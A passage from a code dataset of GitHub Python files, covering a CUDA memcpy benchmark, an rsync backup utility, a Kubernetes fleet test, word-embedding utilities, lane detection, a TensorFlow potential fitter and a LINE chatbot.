plt\n\nimport threading\n# Initialize CUDA\ncuda.init()\n\nglobal ctx\nctx = make_default_context() # will initialize the first device it finds\ndev = ctx.get_device()\n\ndef _finish_up():\n global ctx\n ctx.pop()\n ctx = None\n\n from pycuda.tools import clear_context_caches\n clear_context_caches()\n\nimport atexit\natexit.register(_finish_up)\n\nnum_elems = [5000000, 10000000, 20000000, 30000000, 40000000]\n\n# prints pci_bus_id, device name and device id for installed GPUs. You can run the Linux lspci command on the bus_id to\n# obtain information about the number of PCIe lanes on that bus. This will give you the expected bandwidth\ndef print_device_info():\n driver_ver = cuda.get_version()\n print(\"CUDA Driver Version: {0}.{1}.{2}\".format(driver_ver[0], driver_ver[1], driver_ver[2]))\n num_cuda_devices = cuda.Device.count()\n for i in range(0, num_cuda_devices):\n dev = cuda.Device(i)\n pci_bus_id = dev.pci_bus_id()\n dev_name = dev.name()\n print(\"device id: {0}, device name: {1}, bus_id: {2}\".format(i, dev_name, pci_bus_id))\n\n# Helper function to copy src array to destination using ctypes memmove\ndef copy_np_to_pinned_memory(src, dest):\n src_ = src.ctypes.data_as(ctypes.POINTER(ctypes.c_float))\n dest_ = dest.ctypes.data_as(ctypes.POINTER(ctypes.c_float))\n sz = src.size * ctypes.sizeof(ctypes.c_float)\n ctypes.memmove(dest_, src_, sz)\n\n# This function measures the time taken to transfer data from host-to-device (h2d) when:\n# 1. source is in unpinned (pagaeable) memory\n# 2. source is in pinned memory. In this case, we also measure time taken to transfer data\n# from unpinned to pinned memory.\n# Times are measured for different data sizes and plotted. Data transfer bandwidth is also calculated from\n# the transfer times.\ndef compare_performance():\n # a quick warm up..\n n = 25000000\n a = np.random.randn(n).astype(np.float32)\n # allocate space on GPU\n mem_gpu = cuda.mem_alloc(a.nbytes)\n cuda.memcpy_htod(mem_gpu, a)\n # free space on GPU\n mem_gpu.free()\n h2d_nopin = []\n h2d_nopin_bw = []\n # measure timing without pinning\n for n in num_elems:\n # the data to be transferred\n a = np.random.randn(n).astype(np.float32)\n # allocate space on GPU\n mem_gpu = cuda.mem_alloc(a.nbytes)\n # only measure h2d transfer time\n start = time.perf_counter()\n cuda.memcpy_htod(mem_gpu, a)\n te = time.perf_counter() - start #te: time elapsed\n h2d_nopin.append(te)\n h2d_nopin_bw.append(a.nbytes/(10**9 * (te))) # convert to a bandwidth\n # free space on GPU\n mem_gpu.free()\n # now do pinning and measure time to pin and time to transfer\n h2h_pinned = [] # records the transfer time from unpinned -> pinned memory\n h2d_pin = [] # records the host to device transfer time with data in pinned memory.\n h2d_pin_total = [] # records the total (sum of the previous two)\n h2d_pin_bw = [] #h2d_pin, converted to a bandwidth (GB/sec)\n for i, n in enumerate(num_elems):\n a = np.random.randn(n).astype(np.float32)\n # allocate space on GPU\n mem_gpu = cuda.mem_alloc(a.nbytes)\n # allocate page locked memory\n a_pin = cuda.register_host_memory(a)\n # copy data from np array to pinned memory and measure transfer time\n start = time.perf_counter()\n copy_np_to_pinned_memory(a, a_pin)\n te = time.perf_counter() - start # te: time elapsed\n h2h_pinned.append(te)\n # measure h2d transfer time\n start = time.perf_counter()\n cuda.memcpy_htod(mem_gpu, a_pin)\n te = time.perf_counter() - start #te: time elapsed\n h2d_pin.append(te)\n h2d_pin_bw.append(a.nbytes / (10**9 * te))\n h2d_pin_total.append(h2d_pin[i] + h2h_pinned[i])\n # free allocated pinned memory\n a_pin.base.unregister()\n # free space on GPU\n mem_gpu.free()\n\n fig = plt.figure()\n num_elems_mb = [x*4/10**6 for x in num_elems]\n\n plt.plot(num_elems_mb, h2d_nopin, 'g', label='h2d transfer_time (no pinning)')\n plt.plot(num_elems_mb, h2d_pin, 'r', label='h2d transfer_time (with pinning)')\n plt.plot(num_elems_mb, h2h_pinned, 'b', label='h2h transfer_time')\n plt.plot(num_elems_mb, h2d_pin_total, 'k', label='h2d transfer_time (with pinning, total)')\n plt.legend()\n plt.xlabel('data size (MB)')\n plt.ylabel('time (sec)')\n plt.show()\n\n\nif __name__ == '__main__':\n print_device_info()\n compare_performance()","repo_name":"AbnerVictor/CUDA_PCIE_benchmarking","sub_path":"cuda_memcpy_test.py","file_name":"cuda_memcpy_test.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"686959570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"DOCSTRING goes here\n\"\"\"\n\n\nimport os\nimport sys\nimport time\nimport configparser\nimport pickle\nimport subprocess\nimport logging\n\n\n__author__ = \"Bulak Arpat\"\n__copyright__ = \"Copyright 2017-2018, Bulak Arpat\"\n__license__ = \"GPLv3\"\n__version__ = \"0.0.2\"\n__maintainer__ = \"Bulak Arpat\"\n__email__ = \"Bulak.Arpat@unil.ch\"\n__status__ = \"Development\"\n\n\nAPP_PATH = os.path.join(os.path.expanduser(\"~\"), \".backupy\")\nSUCCESS, INCOMPLETE, FAILED = 0, 1, 2\n\n\nclass Cache(object):\n def __init__(self, cache_file, default_data=None):\n if default_data is None:\n default_data = {}\n try:\n self.cache_file = open(cache_file, 'rb+')\n except IOError:\n self.cache_file = open(cache_file, 'wb+')\n try:\n self._cache = pickle.load(self.cache_file)\n except (pickle.UnpicklingError, EOFError):\n self._cache = default_data\n\n def register(self):\n self.cache_file.seek(0)\n pickle.dump(self._cache, self.cache_file)\n self.cache_file.truncate()\n\n def update(self, *args, **kwargs):\n for arg in args:\n if isinstance(arg, dict):\n kwargs.update(arg)\n elif isinstance(arg, str):\n kwargs[arg] = True\n else:\n raise Exception(\"Can't accept {} as key\".format(arg))\n for key, item in kwargs.items():\n self._cache[key] = item\n self.register()\n\n def has_var(self, var_name):\n return var_name in self._cache\n\n def var_list(self):\n return list(self._cache.keys())\n\n def get(self, var_name):\n return self._cache[var_name]\n\n def __repr__(self):\n return repr(self._cache)\n\n\ndef _get_rysnc_command(source, destination, options):\n rcommand = \"rsync\"\n for opt, opt_val in options.items():\n if opt_val:\n rcommand += ' {}=\"{}\"'.format(opt, opt_val)\n else:\n rcommand += ' {}'.format(opt)\n rcommand += \" {} {}\".format(source, destination)\n return rcommand\n\n\nclass BackupyApp(object):\n\n def __init__(self, app_path):\n self._app_path = app_path\n self._log_file = os.path.join(app_path, \"backupy.log\")\n self._config_file = os.path.join(app_path, \"backupy.conf\")\n self._cache_file = os.path.join(app_path, \".backupy.cache\")\n logging.basicConfig(\n filename=self._log_file, level=logging.DEBUG,\n format='%(levelname)s [%(asctime)s] %(message)s',\n datefmt='%m/%d/%Y %H:%M:%S')\n self.logger = logging.getLogger('backupy')\n self._config = self._set_config(default_config={})\n self.cache = Cache(self._cache_file,\n default_data={'last_state': None,\n 'last_source': None})\n self.logger.info('Initilizing...')\n self.logger.debug('Cache info: {}'.format(self.cache))\n if sys.version_info.minor < 5:\n self._process = self._process_3_4\n else:\n self._process = self._process_3_5\n\n @property\n def app_path():\n return self._app_path\n\n def _set_config(self, default_config):\n config = configparser.ConfigParser(allow_no_value=True)\n config.optionxform = str\n config.read_dict(default_config)\n try:\n config.read(self._config_file)\n except Exception as err:\n print(err)\n return config\n\n def get_config(self, section, option=None):\n conf_section = self._config[section]\n if option is None:\n return conf_section\n else:\n return conf_section.get(option)\n\n def _get_source_order(self):\n source_order = list(self.get_config('sources'))\n last_source = self.cache.get('last_source')\n if last_source in source_order:\n last_index = source_order.index(last_source)\n last_state = self.cache.get('last_state')\n if last_state == SUCCESS:\n pivot_index = last_index + 1\n else:\n pivot_index = last_index\n else:\n pivot_index = 0\n source_order = source_order[pivot_index:] + source_order[:pivot_index]\n return source_order\n\n def _process_3_4(self, r_command):\n try:\n r_process = subprocess.check_output(args=r_command, shell=True,\n stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as err:\n self.cache.update(last_state=FAILED)\n self.logger.error(\n 'rsync returned non-zero exit code: {}'.format(\n err.returncode))\n for line in err.output.splitlines():\n self.logger.error(\n '[rsync] %s', line.decode(\"utf-8\"))\n else:\n self.cache.update(last_state=SUCCESS)\n self.logger.info('backup successfully completed:')\n for line in r_process.splitlines():\n self.logger.info('[rsync] %s', line.decode(\"utf-8\"))\n def _process_3_5(self, r_command):\n r_process = subprocess.run(args=r_command, shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n if not r_process.returncode == 0:\n self.cache.update(last_state=FAILED)\n self.logger.error(\n 'rsync returned non-zero exit code: {}'.format(\n r_process.returncode))\n for line in r_process.stderr.splitlines():\n self.logger.error(\n '[rsync] %s', line.decode(\"utf-8\"))\n else:\n self.cache.update(last_state=SUCCESS)\n self.logger.info('backup successfully completed:')\n for line in r_process.stdout.splitlines():\n self.logger.info('[rsync] %s', line.decode(\"utf-8\"))\n def backup_loop(self):\n source_order = self._get_source_order()\n sources = self.get_config('sources')\n time_limit = float(self.get_config('backup', 'time_limit'))\n finish_time = time.time() + time_limit * 3600\n for source in source_order:\n if time.time() > finish_time:\n self.logger.info('backup halted due to timelimit')\n break\n destination = os.path.join(\n self.get_config('backup', 'destination'), sources[source])\n self.logger.info(\n 'Starting backup {} --> {}'.format(source, destination))\n self.cache.update(last_source=source, last_state=INCOMPLETE)\n r_command = _get_rysnc_command(source=source,\n destination=destination,\n options=self.get_config('rsync'))\n self._process(r_command)\n\n\ndef main():\n app = BackupyApp(app_path=APP_PATH)\n app.backup_loop()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bulak/backupy","sub_path":"backupy.py","file_name":"backupy.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31717002652","text":"FRAME_STYLE = {\"bg\": \"black\"}\r\nLABEL_STYLE = {\"bg\": \"black\",\r\n \"fg\": \"white\",\r\n \"text\": \"Currency exchange rates calculation\".upper(),\r\n \"font\": (\"Calibri\", 15, \"bold\")}\r\nBUTTON_WIDTH = 20\r\nBUTTON_HEIGTH = 2\r\nBUTTON_STYLE = {\"width\": BUTTON_WIDTH,\r\n \"height\": BUTTON_HEIGTH,\r\n \"relief\": \"groove\",\r\n \"borderwidth\": 1,\r\n \"bg\": \"lightgrey\",\r\n \"font\": (\"Calibri\", 12, \"bold\")}\r\n\r\nBASE_URL = f\"https://free.currconv.com/api/v7/\"\r\n\r\n# read file containing the api key.\r\nFILENAME = \"secret.txt\"\r\nwith open(FILENAME, \"r\") as file:\r\n API_KEY = file.readline()\r\n","repo_name":"flizzyflo/CurrencyChange","sub_path":"src/settings/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25442472900","text":"from unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport lobotomy\nfrom kuber.latest import core_v1\n\nfrom manager import _configs\nfrom manager import _controller\nfrom manager import _types\n\n\ndef _create_node(\n name: str,\n fleet: str,\n):\n \"\"\"Creates a node for mocked testing.\"\"\"\n node = core_v1.Node()\n with node.metadata as md:\n md.name = name\n md.labels.update(fleet=fleet)\n md.creation_timestamp = \"2018-01-01T00:00:00Z\"\n return node\n\n\n@lobotomy.patch()\n@patch(\"manager._controller.get_pods\")\n@patch(\"manager._controller._nodes.core_v1.Node.get_resource_api\")\ndef test_get_nodes(\n get_resource_api: MagicMock,\n get_pods: MagicMock,\n lobotomized: lobotomy.Lobotomy,\n):\n \"\"\"...\"\"\"\n get_pods.return_value = []\n api = MagicMock()\n api.list_node.return_value = MagicMock(\n items=[_create_node(\"a\", \"primary-small\"), _create_node(\"b\", \"primary-large\")]\n )\n get_resource_api.return_value = api\n\n configs = _types.ManagerConfigs()\n configs.fleets.append(\n _types.FleetRequirements(\n configs=configs,\n sector=\"primary\",\n size_spec=_types.SMALL_MEMORY_SPEC,\n )\n )\n\n fleet = _types.Fleet(configs.fleets[0], \"fleet-identifier\", 1, {})\n\n # Client for describing fleet instances that may not be in the\n # cluster at the moment.\n lobotomized.add_call(\n \"ec2\",\n \"describe_fleet_instances\",\n {\"ActiveInstances\": [{\"InstanceId\": \"a\"}, {\"InstanceId\": \"c\"}]},\n )\n lobotomized.add_call(\n \"ec2\",\n \"describe_instances\",\n {\n \"Reservations\": [\n {\n \"Instances\": [\n {\"PrivateDnsName\": \"c\", \"InstanceId\": \"c\"},\n {\"PrivateDnsName\": \"d\", \"InstanceId\": \"d\"},\n ]\n }\n ]\n },\n )\n\n nodes = _controller.get_nodes(configs, fleet)\n assert nodes[\"a\"].requirements.size == \"small\"\n assert \"b\" not in nodes, '\"b\" is not in the small fleet'\n assert nodes[\"c\"].state == _configs.WARMING_UP_STATE\n assert nodes[\"d\"].state == _configs.WARMING_UP_STATE\n","repo_name":"rocketboosters/kluster-fleet-manager","sub_path":"manager/tests/_controller/test_get_nodes.py","file_name":"test_get_nodes.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3519155656","text":"from django.shortcuts import render\n\nfrom .models import Produkt\n\n# Create your views here.\n\n#CRUD\n\ndef product_list_view(request):\n produkt_object = Produkt.objects.all()\n context = {\n 'produkty' : produkt_object\n }\n return render(request, \"wyswietl/index.html\", context)","repo_name":"Damianoo00/Spizarnia","sub_path":"src/wyswietl/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70962632429","text":"import zipfile\nfrom pathlib import Path\n\nimport numpy as np\nimport requests\nfrom scipy import spatial\nfrom spacy.language import Language\nfrom tqdm import tqdm\n\n\"\"\"\nWe instantiate Embed as a Singleton to avoid the expensive operation of\nloading the model more than once. See:\nhttps://stackoverflow.com/questions/6760685/creating-a-singleton-in-python\n\"\"\"\nclass Singleton(type):\n _instances = {}\n def __call__(cls, *args, **kwargs):\n if cls not in cls._instances:\n cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)\n return cls._instances[cls]\n\nclass Embed(metaclass=Singleton):\n def __init__(self) -> None:\n WORD_VEC_DATA_SRC = \"https://dl.fbaipublicfiles.com/fasttext/vectors-english/crawl-300d-2M.vec.zip\"\n CACHE_DIR = \"/tmp/embedding_cache\"\n NLP_CACHE = \"/tmp/embedding_cache/nlp/\"\n\n if Path(NLP_CACHE).exists():\n print(\"Loading model from cache\", NLP_CACHE)\n nlp = Language()\n nlp.from_disk(NLP_CACHE)\n else:\n word_vec_data_cache = Path(CACHE_DIR) / Path(WORD_VEC_DATA_SRC).stem\n word_vec_data_cache.parent.mkdir(parents=True, exist_ok=True)\n word_vec_data_zipped = Path(\"/tmp/\") / Path(WORD_VEC_DATA_SRC).name\n word_vec_data_zipped.parent.mkdir(parents=True, exist_ok=True)\n # Download if not cached\n if not word_vec_data_cache.exists():\n print(f\"{word_vec_data_cache} does not exist.\\nDownloading from {WORD_VEC_DATA_SRC}\")\n r = requests.get(WORD_VEC_DATA_SRC, stream=True)\n with open(word_vec_data_zipped, 'wb') as f:\n total_length = int(r.headers.get('content-length'))\n for chunk in tqdm(r.iter_content(chunk_size=1024), total=(total_length/1024) + 1): \n if chunk:\n f.write(chunk)\n f.flush()\n # Unzip\n with zipfile.ZipFile(word_vec_data_zipped, 'r') as zip_ref:\n zip_ref.extractall(word_vec_data_cache.parent)\n else:\n print(f\"Using cached word vectors at {word_vec_data_cache}\")\n\n # Use Spacy to load Vectors\n nlp = Language()\n print('[*] Loading Vectors with Spacy...')\n with open(word_vec_data_cache, \"rb\") as f:\n header = f.readline()\n nr_row, nr_dim = header.split()\n nlp.vocab.reset_vectors(width=int(nr_dim))\n for line in tqdm(f, total=2000000):\n line = line.rstrip().decode(\"utf8\")\n pieces = line.rsplit(\" \", int(nr_dim))\n word = pieces[0]\n vector = np.asarray([float(v) for v in pieces[1:]], dtype=\"f\")\n nlp.vocab.set_vector(word, vector)\n Path(NLP_CACHE).mkdir(parents=True, exist_ok=True)\n nlp.to_disk(NLP_CACHE)\n self.nlp = nlp\n\n def get_embedding(self, string: str) -> np.array:\n vec = self.nlp(string).vector\n return vec / np.linalg.norm(vec)\n\n def get_mean_embedding(self, strings: \"list[str]\") -> np.array:\n # Embed each dataset example into a vector\n embedding_vecs = []\n for s in strings:\n embedding_vecs.append(self.get_embedding(s))\n embedding_vecs = np.array(embedding_vecs)\n # print('Dataset Embedding Matrix Shape:', dataset_vecs.shape)\n avg_vec = embedding_vecs.mean(0)\n norm_avg_vec = avg_vec / np.linalg.norm(avg_vec)\n # print('Unit-Normalized Average Embedding for Dataset Examples:', norm_avg_vec)\n return norm_avg_vec\n\n def get_cosine_distance(vec1, vec2):\n return spatial.distance.cosine(vec1, vec2)\n\n def show_sorted_distances(self, train_strings, candidate_strings, test_true_strings=[]):\n class bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n query_vec = self.get_mean_embedding(train_strings)\n test_strings = test_true_strings + candidate_strings\n distances = []\n # tstart = time.time()\n for c in test_strings:\n candidate_vec = self.get_embedding(c)\n dist = self.get_cosine_distance(query_vec, candidate_vec)\n distances.append(dist)\n # time_per_embedding = (time.time() - tstart) / len(test_strings)\n # print(f\"Embeddings took an average of {time_per_embedding}s ({len(test_strings)} samples)\")\n print(\"Query sentences:\")\n for d in train_strings:\n print(bcolors.OKBLUE + d + bcolors.ENDC)\n print(\"\")\n print(\"Candidate sentences, sorted by cosine distance: (Blue are true examples)\")\n for dist, text in sorted(zip(distances, test_strings)):\n if text in test_true_strings:\n print(bcolors.OKBLUE + f\"{dist:.4f}: {text}\" + bcolors.ENDC)\n else:\n print(f\"{dist:.4f}: {text}\")\n","repo_name":"JunShern/few-shot-pretraining","sub_path":"dataset/curator/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"16597510637","text":"import cv2\nimport numpy as np\nimport cv2, pafy\n\n# 1\ncap = cv2.VideoCapture('/Users/kimjunho/Desktop/OpenCV_study/videos/lane_detect_ex2.mp4') #비디오 객체 cap 생성\nif (not cap.isOpened()):\n print('Error opening video')\n\nret, src = cap.read()\nh, w, c= src.shape\nroi = np.zeros(src.shape, dtype=src.dtype)\nroi[h//2:h,:] = src[h//2:h,:]\nprint('frame.shape =', src.shape) #720 1280\nprint('roi.shape =', roi.shape) #480 640\n\ncv2.imshow('roi', roi)\n\nwhile True:\n ret, frame = cap.read()\n if not ret:\n break\n \n #세로 절반 아래, 가로 1/3~2/3 \n roi = np.zeros((h//2,w,3), dtype=src.dtype)\n roi[:,:] = frame[h//2:h,:]\n \n gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n edges = cv2.Canny(gray, 180, 230)\n\n lines = cv2.HoughLinesP(edges, rho=1, theta=np.pi/180.0, threshold=60)\n \n for line in lines:\n x1, y1, x2, y2 = line[0]\n cv2.line(frame, (x1,y1+h//2), (x2,y2+h//2), (0,0,255), 3)\n\n cv2.imshow('frame', frame)\n cv2.imshow('edges', edges)\n \n key = cv2.waitKey(20)\n if key == 27:\n break\n\nif cap.isOpened():\n cap.release()\ncv2.waitKey()\ncv2.destroyAllWindows()","repo_name":"junho2000/opencv_python","sub_path":"test_project/lane_detect2.py","file_name":"lane_detect2.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28536933072","text":"import os\nimport sys\nimport printer\nimport plotter\nimport tensorflow \t\t\tas \ttf\nimport numpy \t\t\t\tas \tnp\nimport matplotlib.pyplot \tas \tplt\nimport datetime\t\t\t\tas \ttime\nimport argumentparser\t\tas \tap\nimport filefinder\t\t\tas ff\nimport neuralnetwork\t\tas nn\nimport networktrainer\t\tas nt\nimport datagenerator \t\tas gen\nimport checkpointsaver\t\tas \tckps\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\n#tf.set_random_seed(2)\n\nclass TFPotential :\n\tdef __init__(self) :\n\t\tself.argumentParser = ap.ArgumentParser(self)\n\t\tself.fileFinder \t= ff.FileFinder(self)\n\t\tself.inputs\t\t \t= 1\n\t\tself.nLayers \t \t= self.argumentParser.nLayers()\n\t\tself.nNodes \t \t= self.argumentParser.nNodes()\n\t\tself.outputs \t \t= 1\n\t\tself.networkType \t= self.argumentParser.type()\n\t\tself.network \t\t= nn.NeuralNetwork(self)\n\t\tself.network.constructNetwork(inputs\t\t= self.inputs, \n\t\t\t\t\t\t \t\t\t nNodes\t\t= self.nNodes,\n\t\t\t\t\t\t \t\t\t nLayers\t\t= self.nLayers, \n\t\t\t\t\t\t \t\t\t outputs\t\t= self.outputs, \n\t\t\t\t\t\t \t\t\t networkType\t= self.networkType) \n\t\tself.saver \t\t\t= ckps.CheckpointSaver(self, \n\t\t\t\t\t\t\t\t\t\t\t\t self.argumentParser().save)\n\t\tself.networkTrainer = nt.NetworkTrainer(self, self.saver)\n\n\n\t\tself.function\t\t= lambda r: r/r*np.random.normal(0,1)# +np.sin(7.0*np.pi*r)\n\t\tself.function\t\t= lambda r: 1/r**12 - 1/r**6\n\t\tself.function\t\t= lambda r: 4*(1.0/(r**12) - 1.0/(r**6)) - 4*(1.0/(2.5**12) - 1.0/(2.5**6))\n\n\t\t\n\t\tself.dataGenerator\t= gen.DataGenerator(0.87, 2.5, self)\n\t\tself.dataGenerator.setFunction(self.function)\n\t\t\n\t\tif not self.argumentParser().file == None :\n\t\t\tself.dataGenerator.setGeneratorType(\"file\");\n\t\telse :\n\t\t\tself.dataGenerator.setGeneratorType(\"function\")\n\t\t#self.dataGenerator.setGeneratorType(\"VMC\")\n\t\t#self.dataGenerator.setGeneratorType(\"noise\")\n\t\t\n\t\t\n\t\t\n\t\t\n\t\tself.dataSize \t\t= int(9987)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\tself.numberOfEpochs = int(100)\n\t\tself.batchSize\t\t= int(500)\n\t\tself.testSize\t\t= self.dataSize #int(600)\n\t\tself.testInterval\t= 5000\n\t\tself.printer\t\t= printer.Printer(self)\n\t\tself.printer.printSetup()\n\t\tself.plotter \t\t= plotter.Plotter(self)\n\n\n\tdef variableSummaries(self, name, variable) :\n\t\twith tf.name_scope('Summaries'):\n\n\t\t\tmean = tf.reduce_mean(variable)\n\t\t\ttf.summary.scalar('Mean/' + name, mean)\n\n\t\t\twith tf.name_scope('StandardDeviation'):\n\t\t\t\tstddev = tf.sqrt(tf.reduce_mean(tf.square(variable - mean)))\n\n\t\t\ttf.summary.scalar('StandardDeviation/' + name, stddev)\n\t\t\ttf.summary.scalar('Max/' + name, tf.reduce_max(variable))\n\t\t\ttf.summary.scalar('Min/' + name, tf.reduce_min(variable))\n\n\t\t\ttf.summary.histogram(name, variable) \n\n\tdef __call__(self, inputData, expectedOutput=None) :\n\t\tif expectedOutput == None :\n\t\t\texpectedOutput = inputData\n\t\treturn self.sess.run(self.networkTrainer.prediction, \n\t\t\t\t\t\t\t feed_dict={self.networkTrainer.x : inputData,\n\t\t\t\t\t\t\t\t\t self.networkTrainer.y : expectedOutput})\n\n\tdef train(self, epochs=-1) :\n\t\tnumberOfEpochs = self.numberOfEpochs if epochs == -1 else epochs\n\t\tself.numberOfEpochs = numberOfEpochs\n\t\tself.networkTrainer.trainNetwork(numberOfEpochs)\n\t\tself.sess = self.networkTrainer.sess\n\n\tdef setNetworkType(self, typeString) :\n\t\tself.network.parseTypeString(typeString)\n\n\nif __name__ == \"__main__\" :\n\ttfpot = TFPotential()\n\t#tfpot.inputs = 2\n\t#tfpot.dataGenerator.a = 0.45\n\t#tfpot.dataGenerator.b = 1.8\n\t#tfpot.dataGenerator.generatorType = \"SW\"\n\ttfpot.train(tfpot.argumentParser().epochs)\n\t\n\t\n\t\n","repo_name":"mortele/TFPotential","sub_path":"tfpotential.py","file_name":"tfpotential.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20716021756","text":"\r\nfrom cProfile import label\r\nfrom cgitb import text\r\nfrom flask import Flask, request, abort\r\nfrom waitress import serve\r\n\r\nfrom linebot import (\r\n LineBotApi, WebhookHandler\r\n)\r\nfrom linebot.exceptions import (\r\n LineBotApiError, InvalidSignatureError\r\n)\r\nfrom linebot.models import (\r\n MessageEvent, TextMessage, TextSendMessage, FlexSendMessage, PostbackEvent,\r\n QuickReplyButton, MessageAction, QuickReply, LocationAction, LocationMessage\r\n)\r\nimport os\r\nimport json\r\nfrom tenki import tenkii as tnk\r\nfrom tenki import weather2 as tnk2\r\nfrom basu import main as bus\r\nfrom support_center import yomikomi2 as sc\r\nfrom classroom.b import SerchClass\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n#環境変数取得\r\nYOUR_CHANNEL_ACCESS_TOKEN = os.environ[\"YOUR_CHANNEL_ACCESS_TOKEN\"]\r\nYOUR_CHANNEL_SECRET = os.environ[\"YOUR_CHANNEL_SECRET\"]\r\n\r\nline_bot_api = LineBotApi(YOUR_CHANNEL_ACCESS_TOKEN)\r\nhandler = WebhookHandler(YOUR_CHANNEL_SECRET)\r\n\r\nbus_select_data = [0,0,0] # バスの結果を数値でデータ格納[登下校,バスの種類,何限]\r\nbus_select_data_text = [\"\",\"\",\"\"] # バスの結果をそのまま格納[登下校,バスの種類,何限]\r\nperiods_dict = {\"go_home\":0, \"first_period\":1, \"second_period\":2, \"third_period\":3, \"fourth_period\":4, \"fifth_period\":5}\r\nsupport_list = [\"履修\", \"進路\", \"インターンシップ\", \"奨学金\", \"学費\", \"各種証明書\"]\r\nlocation_list =[\"京都女子大学\", \"現在地\"]\r\nsemester = [\"前期\",\"後期\"]\r\nsearch_bool = False\r\nsclass = SerchClass()\r\nsem_result = sclass.kyousitu(\"前期\")\r\n# f = open('bus_option.json', 'r')\r\n# flex_message_json_dict = json.load(f)\r\n# print(flex_message_json_dict)\r\n\r\n\r\n@app.route(\"/callback\", methods=['POST'])\r\ndef callback():\r\n # get X-Line-Signature header value\r\n signature = request.headers['X-Line-Signature']\r\n\r\n # get request body as text\r\n body = request.get_data(as_text=True)\r\n app.logger.info(\"Request body: \" + body)\r\n\r\n # handle webhook body\r\n try:\r\n handler.handle(body, signature)\r\n except InvalidSignatureError:\r\n abort(400)\r\n\r\n return 'OK'\r\n\r\n# @関数名デコレータ(元ある関数を変更せずに要素を���加出来るやつ)になる\r\n# テキストメッセージを受け取った時に動く関数\r\n@handler.add(MessageEvent, message=TextMessage)\r\ndef handle_message(event):\r\n print(\"受け取ったよ!\")\r\n result_contents = TextSendMessage(text=event.message.text)\r\n \r\n global search_bool\r\n global sem_result\r\n print(event)\r\n\r\n # 教室検索モード\r\n if search_bool:\r\n print(\"bool値Trueです!!\")\r\n if event.message.text in semester:\r\n print(sem_result)\r\n sem_result = sclass.kyousitu(event.message.text)\r\n result_contents = [\r\n TextSendMessage(text = f\"{event.message.text}ですね!\"),\r\n TextSendMessage(text = \"続いて調べたい教科のキーワードを入力してください\")\r\n ]\r\n print(sem_result) \r\n else:\r\n classroom = sclass.kyousitu(event.message.text, sem_result)\r\n print(classroom)\r\n result_contents = TextSendMessage(text = classroom)\r\n search_bool = False\r\n \r\n # 教室検索\r\n if event.message.text == \"教室\":\r\n items = [QuickReplyButton(action=MessageAction(label=f\"{sem}\", text=f\"{sem}\")) for sem in semester]\r\n result_contents = [\r\n FlexSendMessage(alt_text='教室検索モード', contents = openJsonFile('json/modeexp.json')),\r\n TextSendMessage(text = \"学期を選択してください\", quick_reply=QuickReply(items=items))\r\n ]\r\n print(\"教科名を入力してください\")\r\n search_bool = True\r\n print(search_bool) \r\n\r\n # 天気\r\n if event.message.text == \"天気\":\r\n items = [QuickReplyButton(action=MessageAction(label=f\"{loc}\", text=f\"{loc}の天気\")) for loc in location_list]\r\n result_contents = [TextSendMessage(text = \"知りたい場所を選んでください\",quick_reply=QuickReply(items=items))]\r\n\r\n if event.message.text == \"京都女子大学の天気\":\r\n weather = tnk2.get_weather_from_location('605-8501')\r\n print(weather)\r\n result_contents = TextSendMessage(text=weather)\r\n # sendMessage(event, \"text\", weather)\r\n \r\n if event.message.text == \"現在地の天気\":\r\n items=[QuickReplyButton(action=LocationAction(label=\"Location\"))]\r\n result_contents = [TextSendMessage(text=\"位置情報ください\",quick_reply=QuickReply(items=items))]\r\n\r\n\r\n\r\n\r\n if event.message.text == \"バスの時刻\":\r\n result_contents = FlexSendMessage(\r\n alt_text='利用バス選択',\r\n # contentsパラメタに, dict型の値を渡す\r\n contents=openJsonFile('json/bus_option.json')\r\n )\r\n\r\n \r\n\r\n if event.message.text == \"大学生活に関する窓口\":\r\n items = [QuickReplyButton(action=MessageAction(label=f\"{support}\", text=f\"{support}\")) for support in support_list]\r\n result_contents = [\r\n TextSendMessage(text=\"進路 履修 インターンシップ 奨学金 各種証明書に関する対応窓口に関する情報を教えます!\"),\r\n TextSendMessage(text=\"知りたいことは何ですか?\", quick_reply=QuickReply(items=items))\r\n ]\r\n\r\n\r\n # ユーザーが送ったメッセージがsupport_listに含まれていたら反応する\r\n if event.message.text in support_list:\r\n result_contents = [\r\n TextSendMessage(text = f\"{event.message.text}の情報はこちらになります!\"),\r\n TextSendMessage(text = sc.center(event.message.text))\r\n ]\r\n\r\n if event.message.text == \"テスト\":\r\n items = 